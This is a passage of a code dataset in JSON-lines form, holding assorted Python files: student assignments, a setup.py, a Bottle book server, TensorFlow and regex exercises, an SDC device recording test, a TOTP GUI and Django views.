print(\"The link_num is = \" + self.link_num)\n print(\"The wan_speed is = \" + self.wan_speed)\n\n\ndef add_office(new_office, new_details):\n \"\"\"\n Adds in a new \"office\" to the dictionary ebrd_offices dictionary. Note that:\n\n new_office = string()\n new_details = list()\n\n Note that I've added this in case you want to add in \"London\". This doesn't actually\n get called in this example...\n \"\"\"\n pfile = open(r'C:\\temp\\offices.pkl', 'rb')\n ebrd_offices = pickle.load(pfile)\n pfile.close()\n\n ebrd_offices[new_office] = new_details\n\n pfile = open(r'C:\\temp\\offices.pkl', 'wb')\n pickle.dump(ebrd_offices, pfile)\n pfile.close()\n\ndef main():\n\n # Add in London office...\n office = 'London'\n office_details = ['United Kingdom', 'LDN', '200', '0', '2000']\n add_office(office, office_details)\n # Let's create a new object from the list (aka \"instantiate\"), let's use Ashgabat, but for illustrative reasons\n # we'll call this \"ashgabat_instance\"\n ashgabat_instance = Office(\"Ashgabat\")\n\n # now let's display the details using the function inside the Office class - remembering\n # that a function within a class is called a \"method\"\n ashgabat_instance.show_details()\n\n # let's say we just want to know the country:\n print(\"\\n\\nCountry is: \" + ashgabat_instance.country)\n\n # Note that you can also access the list, remembering that this is defined in the class\n # as \"self.office_details\". e.g.:\n print(\"\\n\\nCountry from item in list is: \" + ashgabat_instance.office_details[0])\n\n # Cool innit!\n\nif __name__ == '__main__':\n main()","sub_path":"officesObjects/officesWithPickle.py","file_name":"officesWithPickle.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301451672","text":"# COMP3201\n# by Weiming Chen 201504727\n\n# Assignment 5 - LGP program generation structural intron removal\n\nimport random\n\n\ndef printLGP(program):\n operators_set = ['+', '-', '*', '/']\n for i in program:\n if type(i[2]) == str or type(i[3]) == str:\n if type(i[2]) == str:\n print('r' + str(i[0]) + \"=\" + i[2] + operators_set[i[1]] + 'r' + str(i[3]))\n else:\n print('r' + str(i[0]) + \"=\" + 'r' + str(i[2]) + operators_set[i[1]] + i[3])\n else:\n print('r' + str(i[0]) + \"=\" + 'r' + str(i[2]) + operators_set[i[1]] + 'r' + str(i[3]))\n\n\ndef main():\n # setting parameters\n max_prog_length = 6 # 6 instructions in total is the upper limit\n n_calculation_reg = 3 # {r0, r1, r2} and r0 is designated as the output register\n n_input_reg = 2 # {r3, r4}\n n_operators = 4 # {+, -, *, /}\n n_constant = 5 # {1, 2, 3, 4, 5}\n constant_rate = 0.4 # An operand can be a constant with a 40% chance, however, both operands cannot be constants at the same time\n\n ##### 1. randomly generate an LGP program with no more than [max_prog_length] instructions\n # Hint: an instruction can be represented by a list of 4 elements,\n # i.e., its return register, operator, first and second operands\n # an LGP program is thus a list of instructions\n\n # student code begins\n\n program = []\n program_len = random.randint(1, max_prog_length)\n # generate the rest of the instructions\n for i in range(program_len):\n if random.random() > constant_rate:\n op1 = random.randint(0, n_calculation_reg - 1)\n op2 = random.randint(0, n_calculation_reg - 1)\n else:\n cons_op = random.randint(1, 2)\n if cons_op == 1:\n op1 = str(random.randint(1, 5))\n op2 = random.randint(0, n_calculation_reg - 1)\n else:\n op1 = random.randint(0, n_calculation_reg - 1)\n op2 = str(random.randint(1, 5))\n\n io_reg = random.randint(0, n_calculation_reg - 1)\n operator = random.randint(0, n_operators - 1)\n program.append([io_reg, operator, op1, op2, i])\n\n # student code ends\n\n ##### 2. print the LGP program as a list of instructions\n # An instruction should be printed as, for instance r1 = r3 + r0 or r2 = r0 * 5\n\n print(\"The randomly generated LGP program is:\")\n\n # student code begins\n printLGP(program)\n\n # student code ends\n\n ##### 3. remove a program's structural intron\n program_intron_free = []\n effective_registers = ['r0']\n effective_instruction_indices = []\n\n # student code begins\n program_reverse = program[::-1]\n for i in range(len(program_reverse)):\n if program_reverse[i][0] == 0:\n r0 = program_reverse[i]\n program_intron_free.append(r0)\n effective_instruction_indices.append(r0[4])\n if type(r0[2]) != str: effective_registers.append('r' + str(r0[2]))\n if type(r0[3]) != str: effective_registers.append('r' + str(r0[3]))\n cur_eff = r0\n for j in range(i + 1, len(program_reverse)):\n ins = program_reverse[j]\n if (type(ins[0]) == type(cur_eff[2]) and ins[0] == cur_eff[2]) or (\n type(ins[0]) == type(cur_eff[3]) and ins[0] == cur_eff[3]):\n program_intron_free.append(ins)\n effective_registers.append('r' + str(ins[0]))\n effective_instruction_indices.append(ins[4])\n if type(ins[2]) != str: effective_registers.append('r' + str(ins[2]))\n if type(ins[3]) != str: effective_registers.append('r' + str(ins[3]))\n cur_eff = ins\n break\n if len(effective_instruction_indices) == 0:\n effective_registers = []\n else:\n effective_registers = set(effective_registers)\n effective_registers = list(effective_registers)\n # student code ends\n\n ##### 4. print the structual-intron free LGP program\n\n # print the indices of the effective instructions\n print(\"The indices of effective instructions are:\", effective_instruction_indices)\n\n # print the LGP program without structural intron\n print(\"The LGP program withou any structual intron is:\")\n\n # student code begins\n printLGP(program_intron_free)\n\n # student code ends\n\n\n# end of main\n\n\nmain()\n","sub_path":"Assignments/a5/ming/A5.py","file_name":"A5.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305744590","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\nBASE_PATH = Path(__file__).resolve().parent\n\n\n# read the version from the particular file\nwith open(BASE_PATH / \"droplets\" / \"version.py\", \"r\") as f:\n exec(f.read())\n\nDOWNLOAD_URL = (\n f\"https://github.com/zwicker-group/py-droplets/archive/v{__version__}.tar.gz\"\n)\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"py-droplets\",\n package_data={\"droplets\": [\"py.typed\"]},\n packages=find_packages(),\n zip_safe=False, # this is required for mypy to find the py.typed file\n version=__version__,\n license=\"MIT\",\n description=(\n \"Python package for describing and analyzing droplets in experiments and \"\n \"simulations\"\n ),\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"David Zwicker\",\n author_email=\"david.zwicker@ds.mpg.de\",\n url=\"https://github.com/zwicker-group/py-droplets\",\n download_url=DOWNLOAD_URL,\n keywords=[\"emulsions\", \"image-analysis\"],\n python_requires=\">=3.7\",\n install_requires=[\"matplotlib\", \"numpy\", \"numba\", \"scipy\", \"sympy\", \"py-pde\"],\n extras_require={\n \"hdf\": [\"h5py>=2\"],\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155694569","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#Считаем, что архив распакован в папку books, она находится в той же папке, что и все остальные файлы.\n#Заливать 300ГБ на гит -- очень не хочется.\n\nfrom bottle import request, run, route, template\nimport os\n\nimport requests\nimport bs4\nimport random\nimport os\n\nSERVER = \"./server/\"\nBOOKS = SERVER + \"books/\"\n\ndef getAuthorsList():\n\tlist_authors = os.listdir(BOOKS)\n\tif \".DS_Store\" in list_authors:\n\t\tlist_authors.remove(\".DS_Store\")\n\treturn list_authors\n\ndef getBooksByAuthor(author):\n\tlist_books = os.listdir(BOOKS + author + '/')\t\n\treturn list_books\n\n@route('/')\ndef main():\n\tlist_authors = getAuthorsList()\n\tbooks = {}\n\tfor author in list_authors:\n\t\tbooks[author] = getBooksByAuthor(author)\n\tpage = template(SERVER + 'list_of_authors', authors=list_authors, books=books)\n\treturn page\n\n@route('/author//')\ndef getAuthorpage(name):\n\tlist_books = getBooksByAuthor(name)\n\tpage = template(SERVER + 'list_of_books', list_books=list_books, author=name)\n\treturn page\n\n@route('/author//book//')\ndef getBookText(authorName, bookName):\n\tf = open(BOOKS + authorName + '/' + bookName, 'r')\n\tbook_text = f.read()\n\tpage = template(SERVER + 'book_text', text=book_text)\n\treturn page\n\ndef booksMining():\n\n\tif not os.path.exists(BOOKS):\n\t\tos.mkdir(BOOKS)\n\n\tCOUNT_OF_BOOKS = 100\n\tfor i in range(COUNT_OF_BOOKS):\n\t\ttry:\n\t\t\tbookId = random.randint(1000, 15000)\n\t\t\tlink = \"https://www.gutenberg.org/ebooks/\" + str(bookId)\n\t\t\t#link = \"https://www.gutenberg.org/ebooks/10516\"\n\t\t\tpage = requests.get(link).text\n\t\t\tsoup = bs4.BeautifulSoup(page, 'html5lib')\n\t\t\th1 = soup.find('h1').text\n\t\t\tidx = h1.rfind(' by ')\n\t\t\tbook = h1[:idx]\n\t\t\tname = h1[idx+4:]\n\n\t\t\tlink = \"http://www.gutenberg.org/cache/epub/\" + str(bookId) + \"/pg\" + str(bookId) + \".txt\"\n\t\t\tpage = requests.get(link).text\n\t\t\tsoup = bs4.BeautifulSoup(page, 'html5lib')\n\t\t\tbook_text = soup.find('body').text\n\n\t\t\tif not os.path.exists(BOOKS + name):\n\t\t\t\tos.mkdir(BOOKS + name)\n\t\t\tif not os.path.exists(BOOKS + name + '/' + book):\n\t\t\t\tf = open(BOOKS + name + '/' + book, 'w')\n\t\t\t\tf.write(book_text)\n\t\t\t\tf.close()\n\t\texcept:\n\t\t\tcontinue\n\n\nbooksMining()\nrun(host='localhost', port=5555, debug=True)\n","sub_path":"problems 8/volodin/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457830779","text":"from gevent import monkey\nmonkey.patch_all()\nimport pandas as pd\nimport flask\nfrom functions.base_functions import *\nimport sys, os\n\ndef batch_process(url, start, end, name):\n \"\"\"Function to batch process crawling function\n Input: CSV URL, index to read, output file name\n Output: CSV Results\"\"\"\n\n input_df = pd.read_csv(url)\n if start == 0 and end == 0:\n end = len(input_df)\n \n df_res = pd.DataFrame({\"merchant_name\": [], \"broken_link_score\": [], \"link_contact_us_exist\": [], \\\n \"cu_email_exist\": [], \"cu_phone_number_exist\": [], \"link_about_us_exist\": [],\\\n \"link_tnc_exist\": [], \"tnc_refund_policy_exist\": [], \"contact_us_score\": [], \\\n \"tnc_score\": [], \"label\": []})\n \n input_df = input_df.reset_index()\n try:\n for i in range(start, end):\n df = input_df[input_df.index == i] \n url = str(df['website'].values[0])\n print(url + \" --> \" + str(i+1-start))\n hyperlinks = get_hyperlinks(url)\n\n broken_df = broken_link_score(df, hyperlinks)\n important_df = important_links_check(df, hyperlinks)\n contact_df = contact_us_score(df, hyperlinks)\n tnc_df = tnc_score(df, hyperlinks)\n\n dfs = [broken_df, important_df, contact_df, tnc_df]\n dfs = [df.set_index(\"merchant_name\") for df in dfs]\n res = pd.concat(dfs, axis=1, sort=False).reset_index()\n res['label'] = df['label'].values[0]\n\n df_res = pd.concat([df_res, res], sort=False)\n\n res_url = './datasets/' + name + '.csv'\n df_res.to_csv(res_url)\n return str(i+1-start) + \" line(s) successfully written.\"\n except:\n res_url = './datasets/' + name + '.csv'\n df_res.to_csv(res_url)\n return \"Error occured. \" + str(i+1-start-1) + \" line(s) successfully written.\" ","sub_path":"api/functions/batch_processor.py","file_name":"batch_processor.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447240436","text":"# encoding:utf-8\n# 正则表达式的示例\n\nimport re\n\n# # 边界匹配的开始匹配 \\A\n# ps = re.match(r\"\\Aimooc[\\w]*\",'imoocwer')\n# print(ps.group())\n#\n# # 边界匹配的结束匹配 \\Z\n# pe = re.match(r'[\\w]*imooc\\Z', 'qweertrimooc')\n# print(pe.group())\n#\n# # 分组匹配 () [\\w]{4,6} 字符 4 到 6 个\n# pg = re.match(r'[\\w]{4,6}@(126|163).com', 'panlei@126.com')\n# print(pg.group())\n# pg = re.match(r'[\\w]{4,6}@(126|163).com', 'panlei@163.com')\n# print(pg.group())\n#\n# # 分组匹配 引用编号\n# pn = re.match(r'<([\\w]+>)[\\w]+Python\")\n# print(pn.group())\n\n# ?P 为分组起一个名字 (?P=name) 引用名字为name的分组\n\n# re模��的其他方法\n# search 方法,查找字符串中的指定字串\nstr1 = \"find number in sentence 100\"\nsear = re.search(r'\\d+', str1)\nprint(sear.group())\n\n# sub方法,实现替换\nstr2 = \"change 1000 into add one\"\ndef addone(match):\n val = match.group()\n num = int(val) + 1\n return str(num)\n\nma = re.sub(r'\\d+', addone, str2)\nprint(ma)\n\n\n\n\n","sub_path":"TestBoundary.py","file_name":"TestBoundary.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274724773","text":"import requests\nimport pygal\n\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n# Make an API call and store the response.\nurl = \"https://api.github.com/search/repositories?q=language:python&sort=stars\"\nr = requests.get(url)\nprint(\"Status code: \", r.status_code)\n# Store API reponse in a variable.\nresponse_dict = r.json()\n\n# Process results.\nprint(response_dict.keys())\nprint(\"Total repositories: \", response_dict['total_count'])\n\nrepo_dicts = response_dict['items']\nprint(\"Repositories returned: \", len(response_dict['items']))\n\nrepo_dict = repo_dicts[0]\nprint(\"\\nKeys: \", len(repo_dict))\nprint(\"Full name: \", repo_dict['full_name'])\nprint(\"Name: \", repo_dict['name'])\nprint(\"Owner: \", repo_dict['owner'])\n\nnames, plot_dicts = [], []\nfor repo_dict in repo_dicts:\n names.append(repo_dict['name'])\n plot_dicts.append({'value': repo_dict['stargazers_count'],\n 'label': repo_dict['description'],\n 'xlink': repo_dict['html_url']})\nprint(plot_dicts)\n# Make visualization.\nmy_style = LS('#333366', base_style=LCS)\n# Configuration.\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 3\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Project on Github'\nchart.x_labels = names\n\nchart.add('', plot_dicts)\nchart.render_to_file('python_repos.svg')","sub_path":"python_crash_course/data_visualization/python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367129423","text":"#O(N)\n\nfrom collections import deque, defaultdict\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if not root:\n return []\n \n hmap = dict()\n queue = deque([(root, 0)])\n maxCol, minCol = 0, 0\n \n while queue:\n node, col = queue.popleft()\n hmap[col] = hmap.get(col, []) + [node.val]\n if node.left:\n queue.append((node.left, col-1))\n minCol = min(minCol, col-1)\n if node.right:\n queue.append((node.right, col+1))\n maxCol = max(maxCol, col+1)\n \n return [hmap[key] for key in range(minCol, maxCol+1) if key in hmap]","sub_path":"314-Binary Tree Vertical Order Traversal.py","file_name":"314-Binary Tree Vertical Order Traversal.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575011212","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='photocat',\n name='parent',\n field=models.ForeignKey(related_name=b'childs', verbose_name=b'\\xd0\\xa0\\xd0\\xbe\\xd0\\xb4\\xd0\\xb8\\xd1\\x82\\xd0\\xb5\\xd0\\xbb\\xd1\\x8c\\xd1\\x81\\xd0\\xba\\xd0\\xb0\\xd1\\x8f \\xd0\\xba\\xd0\\xb0\\xd1\\x82\\xd0\\xb5\\xd0\\xb3\\xd0\\xbe\\xd1\\x80\\xd0\\xb8\\xd1\\x8f', blank=True, to='app.PhotoCat', null=True),\n ),\n ]\n","sub_path":"app/migrations/0002_auto_20140927_0834.py","file_name":"0002_auto_20140927_0834.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553299982","text":"import tensorflow as tf\nimport numpy as np\n\nbatch_size = 8\n# 输入数据\nX = np.random.rand(1000, 2)\nY = [[int(x0 + x1 < 1)] for x0,x1 in X]\n\nprint('X:', X)\nprint('Y:', Y)\n\n# 网络结构\nx = tf.placeholder(tf.float32, shape=[None, 2])\ny = tf.placeholder(tf.float32, shape=[None, 1])\n\nw1 = tf.Variable(tf.truncated_normal([2,4], stddev=1, seed=1))\nb1 = tf.Variable(tf.zeros([1,4])+0.1)\nl1 = tf.nn.tanh(tf.matmul(x, w1) + b1)\n\nw2 = tf.Variable(tf.truncated_normal([4,1], stddev=1, seed=1))\nb2 = tf.Variable(tf.zeros([1,1])+0.1)\nl2 = tf.nn.tanh(tf.matmul(l1, w2) + b2)\n\nloss = tf.reduce_mean(tf.square(l2-y))\n\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n\nwith tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n for i in range(1000):\n start = (i*batch_size) % len(X)\n end = start + batch_size\n loss_r = session.run(loss, feed_dict={x:X[start:end], y:Y[start:end]})\n print('iter', i, 'loss', loss_r)\n result = session.run(train, feed_dict={x:X[start:end], y:Y[start:end]})\n test_x = np.random.rand(10, 2)\n test_y = [[int(x0 + x1 < 1)] for x0,x1 in test_x]\n result_test = session.run(l2, feed_dict={x:test_x, y:test_y})\n for i in range(10):\n print(test_x[i], result_test[i], test_y[i])\n\n","sub_path":"tensorflow-learning2/tensorflow0-1分类.py","file_name":"tensorflow0-1分类.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455666008","text":"from __future__ import print_function\r\nfrom __future__ import absolute_import\r\n\r\nimport traceback\r\nimport os\r\nimport shutil\r\nimport uuid\r\nimport sdc11073\r\nimport time\r\nimport lxml\r\n\r\nfrom sdc11073 import namespaces\r\nfrom sdc11073.location import SdcLocation\r\nfrom sdc11073.mdib.descriptorcontainers import NumericMetricDescriptorContainer\r\nfrom sdc11073.pmtypes import CodedValue\r\nfrom sdc11073.pysoap.soapenvelope import DPWSThisModel, DPWSThisDevice\r\nfrom sdc11073.sdcdevice import SdcDevice, waveforms\r\nfrom tests.base_test import BaseTest\r\nfrom sdc11073 import pmtypes\r\n\r\n\r\nclass Test_Client_recording(BaseTest):\r\n def setUp(self):\r\n super(Test_Client_recording, self).setUp()\r\n self.setUpCocoDraft10()\r\n self.cleanUpDirs = []\r\n\r\n def tearDown(self):\r\n super(Test_Client_recording, self).tearDown()\r\n self.stopDraft10()\r\n for testDir in self.cleanUpDirs:\r\n try:\r\n shutil.rmtree(testDir)\r\n except:\r\n time.sleep(5)\r\n try:\r\n shutil.rmtree(testDir)\r\n except:\r\n print (traceback.format_exc())\r\n\r\n def testRecording(self):\r\n testFile = \"testFile\"\r\n\r\n # create and start recorder\r\n rec = sdc11073.recording.ClientRecorder(self.sdcClientCocoFinal, \".\", filename=testFile)\r\n rec.startRecording()\r\n self.cleanUpDirs.append(rec.currentRecordingPath)\r\n\r\n # make changes to the mdib\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n mst = mgr.getMetricState('0x34F00100')\r\n if mst.metricValue is None:\r\n mst.mkMetricValue()\r\n mst.metricValue.Value = 12\r\n mst.metricValue.Validity = 'Vld'\r\n mst.metricValue.DeterminationTime = time.time()\r\n metricDescriptor = mgr.getDescriptor('0x34F00100')\r\n metricDescriptor.DeterminationPeriod = 29.0\r\n numericMetricDescriptorContainer = NumericMetricDescriptorContainer(\r\n nsmapper=self.sdcDeviceCoCoFinal.mdib.nsmapper,\r\n nodeName=namespaces.domTag('Metric'),\r\n handle=\"testHandle\",\r\n parentHandle='2.1.1.1' #\"COCO_2827\", #\"\"COCO_3120\",\r\n )\r\n numericMetricDescriptorContainer.Type = CodedValue('11921', 'sys')\r\n numericMetricDescriptorContainer.Unit = CodedValue('11921', 'sys')\r\n numericMetricDescriptorContainer.Resolution=0.01\r\n mgr.createDescriptor(numericMetricDescriptorContainer)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n metricState = mgr.getMetricState(\"testHandle\")\r\n metricState.Validity = 'Vld'\r\n\r\n time.sleep(1)\r\n\r\n mdsHandle = self.sdcDeviceCoCoFinal.mdib.descriptions.NODETYPE.getOne(sdc11073.namespaces.domTag('MdsDescriptor')).handle\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction() as mgr:\r\n tst = mgr.getComponentState(mdsHandle)\r\n tst.ActivationState = \"StndBy\"\r\n time.sleep(1)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n acst = mgr.getAlertState('0xD3C00100')\r\n acst.Presence = False\r\n time.sleep(1)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n asst = mgr.getAlertState('0xD3C00100.loc.Vis')#('AlertSignal_0xD3C00100_Aud')\r\n asst.ActivationState = 'On'\r\n time.sleep(1)\r\n\r\n patientDescriptorContainer = self.sdcDeviceCoCoFinal.mdib.descriptions.NODETYPE.getOne(sdc11073.namespaces.domTag('PatientContextDescriptor'))\r\n # create a patient locally on device, then test update from client\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction() as mgr:\r\n st = mgr.getContextState(patientDescriptorContainer.handle)\r\n st.Givenname = 'Max123'\r\n st.Middlename = 'Willy'\r\n st.Birthname = 'Mustermann \\n'\r\n st.Familyname = 'Musterfrau'\r\n st.Title = 'Rex'\r\n st.Sex = 'M'\r\n st.PatientType = pmtypes.PatientType.ADULT\r\n st.Height = sdc11073.pmtypes.Measurement(88.2, sdc11073.pmtypes.CodedValue('abc', 'def'))\r\n st.Weight = sdc11073.pmtypes.Measurement(68.2, sdc11073.pmtypes.CodedValue('abc'))\r\n st.Race = sdc11073.pmtypes.CodedValue('123', 'def')\r\n\r\n newLocation = SdcLocation(fac='tasdaklx', poc='CsadU1', bed='cocoDraft10Bed')\r\n self.sdcDeviceCoCoFinal.setLocation(newLocation, [])\r\n\r\n\r\n\r\n paw = waveforms.SawtoothGenerator(min_value=0, max_value=10, waveformperiod=1.1,\r\n sampleperiod=0.01)\r\n self.sdcDeviceCoCoFinal.mdib.registerWaveformGenerator('0x34F05500', paw)\r\n\r\n # record some waveforms and then stop\r\n for x in range(20):\r\n time.sleep(1)\r\n # make changes to the mdib\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n mst = mgr.getMetricState('0x34F00100')\r\n mst.metricValue.Value = x\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n asst = mgr.getAlertState('0xD3C00100.loc.Vis') #('AlertSignal_0xD3C00100_Aud')\r\n asst.ActivationState = 'Off'\r\n time.sleep(1)\r\n rec.stopRecording()\r\n # verify recording has stopped by monitoring the file size\r\n recordingFile = os.path.join(rec.currentRecordingPath, testFile)+\".rec\"\r\n currentSize = os.path.getsize(recordingFile)\r\n time.sleep(1)\r\n self.assertEqual(currentSize, os.path.getsize(recordingFile))\r\n #\r\n # verify contents have metric and real time updates\r\n with open(recordingFile, 'r') as f:\r\n version = f.readline()\r\n self.assertTrue(\"pysdc ver\" in version)\r\n\r\n mdib = f.readline()\r\n self.assertTrue(\"GetMdibResponse\" in mdib)\r\n\r\n for line in f:\r\n nodeString = line.split(\"|\", 1)[1]\r\n if nodeString.startswith(\"u'\"):\r\n nodeString = nodeString[2:-2]\r\n else:\r\n nodeString = nodeString[1:-2]\r\n node = lxml.etree.fromstring(nodeString)\r\n\r\n if node.tag == namespaces.msgTag('DescriptionModificationReport'):\r\n val = node.xpath('//dom:MetricValue', namespaces=namespaces.nsmap)\r\n self.assertEqual(val[0].attrib['Value'], '12')\r\n f.close()\r\n break\r\n\r\n #verify archive has been created\r\n rec.archive()\r\n expectedZipFile = os.path.join(rec.currentRecordingPath, testFile) + \".zip\"\r\n self.assertTrue(os.path.exists(expectedZipFile))\r\n rec_file = os.path.join(rec.currentRecordingPath, testFile) + \".rec\"\r\n player = sdc11073.recording.MdibPlayer()\r\n mdib = player.readRecording(rec_file)\r\n\r\n model = DPWSThisModel(manufacturer=\"Draeger\",\r\n manufacturerUrl=\"draeger.com\",\r\n modelName=\"testMOdel\",\r\n modelNumber=\"231412411241\",\r\n modelUrl=\"draeger.com/testMOdel\",\r\n presentationUrl=\"draeger.com/testMOdel\")\r\n device = DPWSThisDevice(friendlyName=\"SuperDevice\",\r\n firmwareVersion=\"v1.23\",\r\n serialNumber=\"MISAD31245124\")\r\n\r\n self._publishingDevice = SdcDevice(self.wsdiscovery, uuid.uuid1(),\r\n model, device, mdib)\r\n # commLogger = commlog.CommLogger(log_folder=\"testcomm\",\r\n # log_out=True,\r\n # log_in=False,\r\n # broadcastIpFilter=None)\r\n # commlog.defaultLogger = commLogger\r\n\r\n self._publishingDevice.startAll()\r\n loca = SdcLocation(fac='Noneas', poc='CU1', bed='cocoDraft6Bed')\r\n self._publishingDevice.setLocation(loca, [])\r\n player.play(self._publishingDevice, loop=True)\r\n time.sleep(40)\r\n player.stop()\r\n","sub_path":"tests/test_recording.py","file_name":"test_recording.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553298653","text":"#! /usr/bin/env python3\nimport gi, time, pyotp, sys, base64, binascii, os\n\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import Gtk\n\n# ensure a secret is passed\nif len(sys.argv) == 3:\n secret = sys.argv[1]\n name = sys.argv[2]\nelse:\n print(\"Incorrect usage. See README.md for examples.\")\n sys.exit()\n\n# validate the secret\ntry:\n authenticator = pyotp.TOTP(secret)\n authenticator.now()\nexcept binascii.Error:\n print(\"Invalid argument . See README.md for examples.\")\n sys.exit()\n\n# create the handlers\nclass Handler:\n def quit(self, *args):\n Gtk.main_quit(*args)\n def generate(self, button):\n entry1 = builder.get_object(\"entry1\")\n entry1.set_text(authenticator.now())\n label1 = builder.get_object(\"label1\")\n label1.set_text(\"Last generated: \" + time.strftime(\"%H:%M:%S\"))\n\n# instantiate gtk and prepare the ui\nbuilder = Gtk.Builder()\ndirectory = os.path.dirname(os.path.realpath(__file__))\nbuilder.add_from_file(directory + \"/gui.glade\")\nbuilder.connect_signals(Handler())\nlabel2 = builder.get_object(\"label2\")\nlabel2.set_text(name)\n\n# boot\nwindow = builder.get_object(\"window1\")\nwindow.show_all()\nGtk.main()\n","sub_path":"googlepythenticator.py","file_name":"googlepythenticator.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154146078","text":"from bookmarks.models import Bookmark\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nfrom .forms import FriendInvitationForm, ProfileForm\nfrom .models import Friendship, Invitation, Profile\n\nUser = get_user_model()\n\n\n@login_required\ndef user_page(request, username):\n user = get_object_or_404(User, username=username)\n # bookmarks = user.bookmark_set.order_by('-id')\n bookmarks = Bookmark.objects.filter(user=user).select_related('user').prefetch_related('tag_set')\n\n # friendship\n is_friend = Friendship.objects.filter(\n from_friend=request.user,\n to_friend=user\n )\n\n # user profile detail\n # profile = Profile.objects.filter(user=request.user).first()\n\n context = {\n 'username': username,\n 'bookmarks': bookmarks,\n 'show_tags': True,\n 'show_edit': username == request.user.username,\n 'is_friend': is_friend,\n 'show_profile': username == request.user.username,\n 'show_delete': username == request.user.username,\n # 'profile': profile,\n }\n return render(request, 'profiles/user_page.html', context)\n\n\n@login_required\ndef friends(request, username):\n # if request.user.username != username:\n # return HttpResponseForbidden('Sorry,you don\\'t have permission.')\n\n user = get_object_or_404(User, username=username)\n # The requested user is the `from_friend`\n friend_list = [friendship.to_friend for friendship in user.friend_set.all()]\n friend_bookmarks = Bookmark.objects.filter(user__in=friend_list).order_by('-id')\n context = {\n 'username': username,\n 'friends': friend_list,\n 'bookmarks': friend_bookmarks[:10],\n 'show_tags': True,\n 'show_users': True\n }\n return render(request, 'profiles/friends.html', context)\n\n\n# TODO: need verification (the other side of friendship)\n@login_required\ndef friend_add(request):\n if 'username' in request.GET:\n friend = get_object_or_404(User, username=request.GET['username'])\n # If already a friend,redirect to friend list page.\n # (Circumvent UNIQUE constraint failed)\n if Friendship.objects.filter(from_friend=request.user, to_friend=friend).exists():\n # TODO: Add django message\n return HttpResponseRedirect(reverse(\n 'profiles:friends', kwargs={'username': request.user.username}\n ))\n friendship = Friendship(from_friend=request.user, 